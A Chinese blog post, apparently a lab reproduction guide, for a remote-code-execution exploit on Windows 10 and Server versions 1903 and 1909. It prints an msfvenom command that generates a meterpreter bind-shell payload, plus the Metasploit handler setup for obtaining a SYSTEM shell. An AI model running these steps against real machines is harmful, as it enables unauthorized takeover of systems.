简单来说,适合内网渗透,除非有人把win10放在了公网上。
危害:拿到shell和系统权限。
利用难度:简单。

1、受影响的系统版本

Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)

复现的话,推荐用这个镜像。

ed2k://|file|cn_windows_10_business_editions_version_1903_updated_sept_2019_x64_dvd_2f5281e1.iso|5231140864|B1D5C4C401036B0B1EBA64476A95F338|/

进去之后把windows防护墙关掉。

2、复现

msfvenom  -p windows/x64/meterpreter/bind_tcp  lport=1234 -f py -o evil.py

生成evil.py,把buf变量改成USER_PAYLOAD,同时,将每行前面加入b,代表byte,后面脚本没有这个会报错。
在这里插入图片描述
然后将启动msf,进行监听。

msf > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf5 exploit(multi/handler) > set lport 1234
lport => 1234
msf5 exploit(multi/handler) > set rhost 172.16.230.165
rhost => 172.16.230.165
msf5 exploit(multi/handler) > exploit

在这里插入图片描述
运行脚本,使用python3。
在这里插入图片描述
执行完毕之后,靶机电脑会要求重启。
然后我们这边就会获得一个带有系统权限的shell。
在这里插入图片描述

3、总结

没啥总结的,动起手来是王道。

脚本在这

Logo

CSDN联合极客时间,共同打造面向开发者的精品内容学习社区,助力成长!

更多推荐